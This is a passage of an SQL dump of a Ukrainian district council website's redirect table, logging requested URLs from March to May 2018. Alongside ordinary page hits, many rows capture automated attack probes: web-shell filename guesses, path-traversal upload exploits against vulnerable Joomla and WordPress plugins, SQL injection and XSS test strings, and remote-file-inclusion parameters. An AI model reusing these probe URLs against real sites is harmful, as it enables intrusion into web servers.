00:00:00',301),(31555,'http://malyn-rayrada.gov.ua/index.php/gaestebuch/',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 00:00:00',301),(31556,'http://malyn-rayrada.gov.ua/gaestebuch',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 00:00:00',301),(31557,'http://malyn-rayrada.gov.ua/index.php?option=com_easygb',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 00:00:00',301),(31558,'http://malyn-rayrada.gov.ua/index.php?option=com_akobook',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 00:00:00',301),(31559,'http://malyn-rayrada.gov.ua/index.php?option=com_vitabook',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 00:00:00',301),(31560,'http://malyn-rayrada.gov.ua/index.php?option=com_jambook',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31561,'http://malyn-rayrada.gov.ua/component/jambook/',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31562,'http://malyn-rayrada.gov.ua/index.php/component/jambook/',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31563,'http://malyn-rayrada.gov.ua/guestbook/',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31564,'http://malyn-rayrada.gov.ua/index.php/guestbook/',NULL,'','',4,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31565,'http://malyn-rayrada.gov.ua/index.php/gaestebuch',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31566,'http://malyn-rayrada.gov.ua/index.php?option=com_phocaguestbook&id=1',NULL,'','',2,0,'2018-03-12 16:00:42','0000-00-00 00:00:00',301),(31567,'http://malyn-rayrada.gov.ua/index.php?option=com_phocaguestbook',NULL,'','',2,0,'2018-03-12 16:00:43','0000-00-00 00:00:00',301),(31568,'http://www.malyn-rayrada.gov.ua//wp-login.php',NULL,'','',11,0,'2018-03-13 09:13:50','0000-00-00 00:00:00',301),(31569,'http://www.malyn-rayrada.gov.ua/blog//wp-login.php',NULL,'','',11,0,'2018-03-13 09:13:58','0000-00-00 00:00:00',301),(31570,'http://www.malyn-rayrada.gov.ua/wordpress//wp-login.php',NULL,'','',11,0,'2018-03-13 09:14:01','0000-00-00 00:00:00',301),(31571,'http://www.malyn-rayrada.gov.ua/wp//wp-login.php',NULL,'','',11,0,'2018-03-13 09:14:09','0000-00-00 00:00:00',301),(31572,'http://malyn-rayrada.gov.ua/upload.php',NULL,'','',2,0,'2018-03-17 19:52:33','0000-00-00 00:00:00',301),(31573,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1897-pro-khid-vikonannya-rajonnoji-programi-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki',NULL,'','',37,0,'2018-03-23 19:13:53','0000-00-00 00:00:00',301),(31574,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1922-pro-zatverdzhennya-rajonnoji-programi-vidshkoduvannya-majnovoji-shkodi-zbitkiv-vlasnikam-tvarin-za-viluchene-pogoliv-ya-svinej-u-zv-yazku-zi-spalakhom-07-10-2017-roku-afrikanskoji-chumi-svinej-u-seli-golovki',NULL,'','',32,0,'2018-03-23 21:36:53','0000-00-00 00:00:00',301),(31575,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1897-pro-khid-vikonannya-rajonnoji-programi-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki',NULL,'','',17,0,'2018-03-24 06:39:56','0000-00-00 00:00:00',301),(31576,'http://malyn-rayrada.gov.ua/index.php/1868-vitaemo-pochesnogo-gromadyanina-malinskogo-rajonu-deputata-malinskoji-rajonnoji-radi-vyacheslava-kashitsyu-iz-prisvoennyam-pochesnogo-zvannya',NULL,'','',1,0,'2018-03-24 22:10:05','0000-00-00 00:00:00',301),(31577,'http://malyn-rayrada.gov.ua/ckupload/ckupload.php',NULL,'','',1,0,'2018-03-27 04:39:44','0000-00-00 00:00:00',301),(31578,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/index.html',NULL,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/index.html','',1,0,'2018-03-28 15:26:04','0000-00-00 00:00:00',301),(31579,'http://malyn-rayrada.gov.ua/media/error.php',NULL,'','',1,0,'2018-03-28 18:53:40','0000-00-00 00:00:00',301),(31580,'http://malyn-rayrada.gov.ua/error.php',NULL,'','',5,0,'2018-03-28 18:53:43','0000-00-00 00:00:00',301),(31581,'http://malyn-rayrada.gov.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../izoc.php',NULL,'','',1,0,'2018-03-28 18:53:44','0000-00-00 00:00:00',301),(31582,'http://malyn-rayrada.gov.ua/components/com_b2jcontact/izoc.php',NULL,'','',1,0,'2018-03-28 18:53:45','0000-00-00 00:00:00',301),(31583,'http://malyn-rayrada.gov.ua/attachments/article/1893/ð·ð²ñ–ñ‚ ð¾ñ€ð³ð°ð½ñ–ð·ð°ñ†ñ–ñ… ð²ðµñ‚ðµñ€ð°ð½ñ–ð².pdf',NULL,'','',1,0,'2018-03-28 19:03:28','0000-00-00 00:00:00',301),(31584,'http://www.malyn-rayrada.gov.ua/wp-content/themes/satoshi/upload-file.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/satoshi/upload-file.php','',1,0,'2018-03-31 16:01:08','0000-00-00 00:00:00',301),(31585,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1922-pro-zatverdzhennya-rajonnoji-programi-vidshkoduvannya-majnovoji-shkodi-zbitkiv-vlasnikam-tvarin-za-viluchene-pogoliv-ya-svinej-u-zv-yazku-zi-spalakhom-07-10-2017-roku-afrikanskoji-chumi-svinej-u-seli-golovki',NULL,'','',16,0,'2018-04-03 15:05:38','0000-00-00 00:00:00',301),(31586,'http://malyn-rayrada.gov.ua/ckupload.php',NULL,'','',1,0,'2018-04-03 20:10:55','0000-00-00 00:00:00',301),(31587,'http://www.malyn-rayrada.gov.ua/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','',1,0,'2018-04-04 17:55:41','0000-00-00 00:00:00',301),(31588,'http://www.malyn-rayrada.gov.ua/index.php/776-veb-kamera-v-centri-malina/tt0002/mollyslaptop_w617601.b10de07aaf4822ab78bf9fc6cb51e4d4/0/windows 7 x64 sp1/1013/197.58.23.172/1b11aba3cdc04496695f64e9db6dc83c2cd8b8821dd86fcef948bbe27f4d8158/etd1eu5qkefqptnxyiczjmpfx3xw1e/',NULL,'','',5,0,'2018-04-04 22:33:36','0000-00-00 00:00:00',301),(31589,'http://www.malyn-rayrada.gov.ua/ca.php?m=4f5441744d6b49744d7a51744d7a55744d7a59744f44553d&h=437',NULL,'','',5,0,'2018-04-04 22:49:44','0000-00-00 00:00:00',301),(31590,'http://www.malyn-rayrada.gov.ua/index.php/config',NULL,'','',3,0,'2018-04-04 22:55:00','0000-00-00 00:00:00',301),(31591,'http://malyn-rayrada.gov.ua/index.php/1721-pro-sklikannya-17-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',37,0,'2018-04-05 14:20:09','0000-00-00 00:00:00',301),(31592,'http://www.malyn-rayrada.gov.ua//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',2,0,'2018-04-05 17:26:42','0000-00-00 00:00:00',301),(31593,'http://www.malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-04-05 21:25:01','0000-00-00 00:00:00',301),(31594,'http://malyn-rayrada.gov.ua/index.php/1716-osobistij-prijom-gromadyan-p-v-dzyublikom-24-kvitnya-2017-roku',NULL,'','',48,0,'2018-04-06 14:04:06','0000-00-00 00:00:00',301),(31595,'http://www.malyn-rayrada.gov.ua/index.php/1765-pro-sklikannya-18-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-04-06 14:09:59','0000-00-00 00:00:00',301),(31596,'http://malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-04-07 00:38:56','0000-00-00 00:00:00',301),(31597,'http://www.malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-04-07 02:02:42','0000-00-00 00:00:00',301),(31598,'http://www.malyn-rayrada.gov.ua/index.php/1714-vitaemo-iz-velikodnem',NULL,'','',1,0,'2018-04-07 03:18:16','0000-00-00 00:00:00',301),(31599,'http://www.malyn-rayrada.gov.ua/index.php/1765-pro-sklikannya-18-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',13,0,'2018-04-07 10:31:48','0000-00-00 00:00:00',301),(31600,'http://www.malyn-rayrada.gov.ua/index.php/1840-pro-sklikannya-21-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',12,0,'2018-04-07 10:57:13','0000-00-00 00:00:00',301),(31601,'http://malyn-rayrada.gov.ua/index.php/1765-pro-sklikannya-18-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',23,0,'2018-04-07 18:05:35','0000-00-00 00:00:00',301),(31602,'http://malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',28,0,'2018-04-07 19:33:02','0000-00-00 00:00:00',301),(31603,'http://www.malyn-rayrada.gov.ua/index.php/1742-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-zasterigae',NULL,'','',17,0,'2018-04-08 05:47:10','0000-00-00 00:00:00',301),(31604,'http://malyn-rayrada.gov.ua/index.php/1840-pro-sklikannya-21-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',26,0,'2018-04-08 12:01:40','0000-00-00 00:00:00',301),(31605,'http://www.malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',19,0,'2018-04-08 13:30:51','0000-00-00 00:00:00',301),(31606,'http://malyn-rayrada.gov.ua/index.php/1742-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-zasterigae',NULL,'','',39,0,'2018-04-08 15:03:39','0000-00-00 00:00:00',301),(31607,'http://malyn-rayrada.gov.ua/xxx.php',NULL,'','',2,0,'2018-04-08 19:48:59','0000-00-00 00:00:00',301),(31608,'http://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',1,0,'2018-04-08 19:49:09','0000-00-00 00:00:00',301),(31609,'http://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:09','0000-00-00 00:00:00',301),(31610,'http://malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2018-04-08 19:49:10','0000-00-00 00:00:00',301),(31611,'http://malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/images/socialpinboard/temp/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:14','0000-00-00 00:00:00',301),(31612,'http://malyn-rayrada.gov.ua/tmp/plupload/rxr.php',NULL,'','',1,0,'2018-04-08 19:49:19','0000-00-00 00:00:00',301),(31613,'http://malyn-rayrada.gov.ua/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-04-08 19:49:20','0000-00-00 00:00:00',301),(31614,'http://malyn-rayrada.gov.ua/com_sexycontactform/fileupload/files/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:21','0000-00-00 00:00:00',301),(31615,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:31','0000-00-00 00:00:00',301),(31616,'http://malyn-rayrada.gov.ua/index.php?option=com_jwallpapers&task=upload',NULL,'','',2,0,'2018-04-08 19:49:34','0000-00-00 00:00:00',301),(31617,'http://malyn-rayrada.gov.ua/jwallpapers_files/plupload/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:35','0000-00-00 00:00:00',301),(31618,'http://malyn-rayrada.gov.ua/components/com_facileforms/libraries/jquery/rxr__lzwqh.php',NULL,'','',1,0,'2018-04-08 19:49:38','0000-00-00 00:00:00',301),(31619,'http://malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-04-09 04:53:30','0000-00-00 00:00:00',301),(31620,'http://malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',32,0,'2018-04-09 11:26:49','0000-00-00 00:00:00',301),(31621,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php','',1,0,'2018-04-10 13:18:56','0000-00-00 00:00:00',301),(31622,'http://malyn-rayrada.gov.ua/yt.php',NULL,'','',1,0,'2018-04-11 06:29:40','0000-00-00 00:00:00',301),(31623,'http://malyn-rayrada.gov.ua/index.php?option=com_community&view=frontpage',NULL,'','',2,0,'2018-04-11 20:42:35','0000-00-00 00:00:00',301),(31624,'http://malyn-rayrada.gov.ua/yt2.php',NULL,'','',1,0,'2018-04-12 00:53:24','0000-00-00 00:00:00',301),(31625,'http://malyn-rayrada.gov.ua/ytt.php',NULL,'','',1,0,'2018-04-12 07:58:32','0000-00-00 00:00:00',301),(31626,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',1,0,'2018-04-12 08:38:05','0000-00-00 00:00:00',301),(31627,'http://malyn-rayrada.gov.ua/wp-cahce.php',NULL,'','',1,0,'2018-04-12 13:16:58','0000-00-00 00:00:00',301),(31628,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1988-pro-timchasovij-poryadok-vidalennya-derev-kushchiv-gazoniv-i-kvitnikiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu',NULL,'','',6,0,'2018-04-12 14:48:21','0000-00-00 00:00:00',301),(31629,'http://malyn-rayrada.gov.ua/assets/images/search.php',NULL,'','',1,0,'2018-04-12 17:08:11','0000-00-00 00:00:00',301),(31630,'http://malyn-rayrada.gov.ua/wp-logs.php?action=test',NULL,'','',1,0,'2018-04-12 19:48:26','0000-00-00 00:00:00',301),(31631,'http://malyn-rayrada.gov.ua/wp-feed.php',NULL,'','',1,0,'2018-04-13 00:57:59','0000-00-00 00:00:00',301),(31632,'http://malyn-rayrada.gov.ua/wp-rdf.php',NULL,'','',1,0,'2018-04-13 06:27:02','0000-00-00 00:00:00',301),(31633,'http://malyn-rayrada.gov.ua/wp-register.php',NULL,'','',1,0,'2018-04-13 08:52:06','0000-00-00 00:00:00',301),(31634,'http://malyn-rayrada.gov.ua/cache.php',NULL,'','',1,0,'2018-04-13 17:39:29','0000-00-00 00:00:00',301),(31635,'http://malyn-rayrada.gov.ua/images/readmes.php',NULL,'','',2,0,'2018-04-13 20:35:40','0000-00-00 00:00:00',301),(31636,'http://malyn-rayrada.gov.ua/libraries/modules.php',NULL,'','',2,0,'2018-04-13 20:56:50','0000-00-00 00:00:00',301),(31637,'http://malyn-rayrada.gov.ua/writebab.php',NULL,'','',1,0,'2018-04-13 22:38:54','0000-00-00 00:00:00',301),(31638,'http://www.malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',14,0,'2018-04-14 23:28:37','0000-00-00 00:00:00',301),(31639,'http://malyn-rayrada.gov.ua/xml.php',NULL,'','',2,0,'2018-04-15 09:53:23','0000-00-00 00:00:00',301),(31640,'http://malyn-rayrada.gov.ua/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'','',2,0,'2018-04-15 20:36:24','0000-00-00 00:00:00',301),(31641,'http://malyn-rayrada.gov.ua/show.php?check=1',NULL,'','',1,0,'2018-04-16 00:14:58','0000-00-00 00:00:00',301),(31642,'http://malyn-rayrada.gov.ua/1.php',NULL,'','',2,0,'2018-04-16 06:08:48','0000-00-00 00:00:00',301),(31643,'http://malyn-rayrada.gov.ua/hivcxa.php',NULL,'','',1,0,'2018-04-16 09:20:39','0000-00-00 00:00:00',301),(31644,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php','',1,0,'2018-04-16 10:10:26','0000-00-00 00:00:00',301),(31645,'http://malyn-rayrada.gov.ua/versions.php',NULL,'','',1,0,'2018-04-16 21:02:01','0000-00-00 00:00:00',301),(31646,'http://malyn-rayrada.gov.ua/index.php?format=feed\'\"\\\'\\\">deadbeef&type=rss',NULL,'','',1,0,'2018-04-16 22:06:40','0000-00-00 00:00:00',301),(31647,'http://malyn-rayrada.gov.ua/index.php?format=feed\"+and+1=2+union+select+1337--&type=rss',NULL,'','',1,0,'2018-04-16 22:06:40','0000-00-00 00:00:00',301),(31648,'http://malyn-rayrada.gov.ua/index.php?format=feed\'+and+1=2+union+select+1337--&type=rss',NULL,'','',1,0,'2018-04-16 22:06:40','0000-00-00 00:00:00',301),(31649,'http://malyn-rayrada.gov.ua/index.php?format=feed+and+1=2+union+select+1337--&type=rss',NULL,'','',1,0,'2018-04-16 22:06:41','0000-00-00 00:00:00',301),(31650,'http://malyn-rayrada.gov.ua/index.php/component/search/?layout=blog&id=8&itemid=104&format=opensearch\'\"\\\'\\\">deadbeef',NULL,'','',1,0,'2018-04-16 22:06:44','0000-00-00 00:00:00',301),(31651,'http://malyn-rayrada.gov.ua/index.php/component/search/?layout=blog&id=8&itemid=104&format=opensearch\"+and+1=2+union+select+1337--',NULL,'','',1,0,'2018-04-16 22:06:44','0000-00-00 00:00:00',301),(31652,'http://malyn-rayrada.gov.ua/index.php/component/search/?layout=blog&id=8&itemid=104&format=opensearch\'+and+1=2+union+select+1337--',NULL,'','',1,0,'2018-04-16 22:06:44','0000-00-00 00:00:00',301),(31653,'http://malyn-rayrada.gov.ua/index.php/component/search/?layout=blog&id=8&itemid=104&format=opensearch+and+1=2+union+select+1337--',NULL,'','',1,0,'2018-04-16 22:06:45','0000-00-00 00:00:00',301),(31654,'http://malyn-rayrada.gov.ua/wp-checking.php',NULL,'','',1,0,'2018-04-17 05:54:50','0000-00-00 00:00:00',301),(31655,'http://malyn-rayrada.gov.ua/unz.php',NULL,'','',1,0,'2018-04-17 09:27:00','0000-00-00 00:00:00',301),(31656,'http://malyn-rayrada.gov.ua/xmlrpc-blog.php',NULL,'','',1,0,'2018-04-17 21:39:57','0000-00-00 00:00:00',301),(31657,'http://malyn-rayrada.gov.ua/search.php',NULL,'','',6,0,'2018-04-18 07:05:32','0000-00-00 00:00:00',301),(31658,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/omni-secure-files/plupload/examples/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/omni-secure-files/plupload/examples/upload.php','',1,0,'2018-04-18 10:54:37','0000-00-00 00:00:00',301),(31659,'http://malyn-rayrada.gov.ua/media/v5.php',NULL,'','',1,0,'2018-04-18 14:05:54','0000-00-00 00:00:00',301),(31660,'http://malyn-rayrada.gov.ua/v5.php',NULL,'','',1,0,'2018-04-18 14:05:55','0000-00-00 00:00:00',301),(31661,'http://malyn-rayrada.gov.ua/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-04-18 14:05:55','0000-00-00 00:00:00',301),(31662,'http://malyn-rayrada.gov.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-04-18 14:05:56','0000-00-00 00:00:00',301),(31663,'http://malyn-rayrada.gov.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-04-18 14:05:56','0000-00-00 00:00:00',301),(31664,'http://malyn-rayrada.gov.ua/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-04-18 14:05:56','0000-00-00 00:00:00',301),(31665,'http://malyn-rayrada.gov.ua/tmp/plupload/def.html',NULL,'','',1,0,'2018-04-18 14:05:58','0000-00-00 00:00:00',301),(31666,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/v5.php',NULL,'','',1,0,'2018-04-18 14:06:01','0000-00-00 00:00:00',301),(31667,'http://malyn-rayrada.gov.ua/admin.admin.html.php?mosconfig_absolute_path=',NULL,'','',2,0,'2018-04-18 14:06:03','0000-00-00 00:00:00',301),(31668,'http://malyn-rayrada.gov.ua/index.php?option=com_weblinks&view=archive',NULL,'','',1,0,'2018-04-18 14:06:08','0000-00-00 00:00:00',301),(31669,'http://malyn-rayrada.gov.ua/index.php?option=com_content&view=article&id=[a valid id]&itemid=[a valid id]&sflaction=dir&sfldir=',NULL,'','',1,0,'2018-04-18 14:06:09','0000-00-00 00:00:00',301),(31670,'http://malyn-rayrada.gov.ua/index.php?option=com_users&view=archive',NULL,'','',1,0,'2018-04-18 14:06:10','0000-00-00 00:00:00',301),(31671,'http://malyn-rayrada.gov.ua/admin.a6mambocredits.php?mosconfig_absolute_path=',NULL,'','',1,0,'2018-04-18 14:06:11','0000-00-00 00:00:00',301),(31672,'http://malyn-rayrada.gov.ua/admin.a6mambohelpdesk.php?mosconfig_live_site=',NULL,'','',1,0,'2018-04-18 14:06:11','0000-00-00 00:00:00',301),(31673,'http://malyn-rayrada.gov.ua/admin.advancedpoll.php?mosconfig_live_site=',NULL,'','',1,0,'2018-04-18 14:06:11','0000-00-00 00:00:00',301),(31674,'http://malyn-rayrada.gov.ua/admin.akocomment.php?mosconfig_live_site=',NULL,'','',1,0,'2018-04-18 14:06:12','0000-00-00 00:00:00',301),(31675,'http://malyn-rayrada.gov.ua/com_articles.php?absolute_path=',NULL,'','',1,0,'2018-04-18 14:06:12','0000-00-00 00:00:00',301),(31676,'http://malyn-rayrada.gov.ua/artlinks.dispnew.php?mosconfig_absolute_path=',NULL,'','',1,0,'2018-04-18 14:06:13','0000-00-00 00:00:00',301),(31677,'http://malyn-rayrada.gov.ua/lang.php?mosconfig_absolute_path=',NULL,'','',2,0,'2018-04-18 14:06:13','0000-00-00 00:00:00',301),(31678,'http://malyn-rayrada.gov.ua/tar.php?mosconfig_absolute_path=',NULL,'','',1,0,'2018-04-18 14:06:14','0000-00-00 00:00:00',301),(31679,'http://malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-04-19 06:33:27','0000-00-00 00:00:00',301),(31680,'http://malyn-rayrada.gov.ua/wp-includse.php?script=1',NULL,'','',1,0,'2018-04-19 10:26:46','0000-00-00 00:00:00',301),(31681,'http://malyn-rayrada.gov.ua/xmlrpc-activate.php',NULL,'','',1,0,'2018-04-21 04:43:55','0000-00-00 00:00:00',301),(31682,'http://malyn-rayrada.gov.ua/wp-print.php?script=1',NULL,'','',1,0,'2018-04-21 15:42:18','0000-00-00 00:00:00',301),(31683,'http://malyn-rayrada.gov.ua/wp-installation.php',NULL,'','',1,0,'2018-04-21 19:49:19','0000-00-00 00:00:00',301),(31684,'http://malyn-rayrada.gov.ua/index.php/1780-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-nagoloshue-vid-kishkovikh-infektsij-mozhna-uberegtisya',NULL,'','',33,0,'2018-04-21 21:12:25','0000-00-00 00:00:00',301),(31685,'http://malyn-rayrada.gov.ua/wp-log-7.php',NULL,'','',1,0,'2018-04-22 06:09:14','0000-00-00 00:00:00',301),(31686,'http://malyn-rayrada.gov.ua/sitemap.xml.php',NULL,'','',1,0,'2018-04-22 08:36:28','0000-00-00 00:00:00',301),(31687,'http://www.malyn-rayrada.gov.ua/index.php/1721-pro-sklikannya-17-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',17,0,'2018-04-22 10:35:38','0000-00-00 00:00:00',301),(31688,'http://www.malyn-rayrada.gov.ua/index.php/1716-osobistij-prijom-gromadyan-p-v-dzyublikom-24-kvitnya-2017-roku',NULL,'','',22,0,'2018-04-22 17:35:29','0000-00-00 00:00:00',301),(31689,'http://www.malyn-rayrada.gov.ua/index.php/favicon.ico',NULL,'','',2,0,'2018-04-23 12:55:34','0000-00-00 00:00:00',301),(31690,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/favicon.ico',NULL,'','',1,0,'2018-04-23 12:56:25','0000-00-00 00:00:00',301),(31691,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/favicon.ico',NULL,'','',2,0,'2018-04-23 12:57:18','0000-00-00 00:00:00',301),(31692,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/','',1,0,'2018-04-23 18:43:03','0000-00-00 00:00:00',301),(31693,'http://malyn-rayrada.gov.ua/wp-profi1e.php?x=1',NULL,'','',1,0,'2018-04-23 23:12:49','0000-00-00 00:00:00',301),(31694,'http://malyn-rayrada.gov.ua/wp-main.php',NULL,'','',1,0,'2018-04-24 03:26:51','0000-00-00 00:00:00',301),(31695,'http://malyn-rayrada.gov.ua/wp-tmp.php',NULL,'','',1,0,'2018-04-24 07:23:30','0000-00-00 00:00:00',301),(31696,'http://malyn-rayrada.gov.ua/info.php',NULL,'','',6,0,'2018-04-24 11:01:49','0000-00-00 00:00:00',301),(31697,'http://malyn-rayrada.gov.ua/6c3feced5fe97be15edcefad3cdc76e7.php',NULL,'','',1,0,'2018-04-24 14:48:23','0000-00-00 00:00:00',301),(31698,'http://malyn-rayrada.gov.ua/missok.php?x=1',NULL,'','',1,0,'2018-04-24 18:41:42','0000-00-00 00:00:00',301),(31699,'http://malyn-rayrada.gov.ua/wp-kidmx.php?script=1',NULL,'','',1,0,'2018-04-24 22:38:23','0000-00-00 00:00:00',301),(31700,'http://malyn-rayrada.gov.ua/index.php/1993-ogoloshennya-pro-seminar',NULL,'','',35,0,'2018-04-25 15:37:32','0000-00-00 00:00:00',301),(31701,'http://www.malyn-rayrada.gov.ua/index.php/1780-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-nagoloshue-vid-kishkovikh-infektsij-mozhna-uberegtisya',NULL,'','',15,0,'2018-04-29 19:07:06','0000-00-00 00:00:00',301),(31702,'http://www.malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi',NULL,'','',8,0,'2018-05-01 13:58:02','0000-00-00 00:00:00',301),(31703,'http://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',1,0,'2018-05-02 15:47:32','0000-00-00 00:00:00',301),(31704,'http://malyn-rayrada.gov.ua/bacot.php',NULL,'http://site.ru','',1,0,'2018-05-02 16:12:29','0000-00-00 00:00:00',301),(31705,'http://malyn-rayrada.gov.ua/aa.php',NULL,'http://site.ru','',2,0,'2018-05-02 16:41:51','0000-00-00 00:00:00',301),(31706,'http://malyn-rayrada.gov.ua/yusa.php',NULL,'http://site.ru','',1,0,'2018-05-02 16:44:00','0000-00-00 00:00:00',301),(31707,'http://malyn-rayrada.gov.ua/wp-logout.php',NULL,'http://site.ru','',1,0,'2018-05-02 16:48:50','0000-00-00 00:00:00',301),(31708,'http://malyn-rayrada.gov.ua/image.php',NULL,'http://site.ru','',1,0,'2018-05-02 17:10:55','0000-00-00 00:00:00',301),(31709,'http://malyn-rayrada.gov.ua/class-wp-defaults.php',NULL,'http://site.ru','',2,0,'2018-05-02 17:15:10','0000-00-00 00:00:00',301),(31710,'http://malyn-rayrada.gov.ua/hx.php',NULL,'http://site.ru','',1,0,'2018-05-02 17:16:17','0000-00-00 00:00:00',301),(31711,'http://malyn-rayrada.gov.ua/.smileys/systems.php',NULL,'http://site.ru','',1,0,'2018-05-02 17:32:15','0000-00-00 00:00:00',301),(31712,'http://malyn-rayrada.gov.ua/wp-mains.php',NULL,'http://site.ru','',3,0,'2018-05-02 18:22:40','0000-00-00 00:00:00',301),(31713,'http://malyn-rayrada.gov.ua/pdo.inc.php',NULL,'http://site.ru','',1,0,'2018-05-02 18:25:52','0000-00-00 00:00:00',301),(31714,'http://malyn-rayrada.gov.ua/404.php',NULL,'http://site.ru','',2,0,'2018-05-02 18:27:34','0000-00-00 00:00:00',301),(31715,'http://malyn-rayrada.gov.ua/wp-blog-mail.php',NULL,'http://site.ru','',1,0,'2018-05-02 18:50:16','0000-00-00 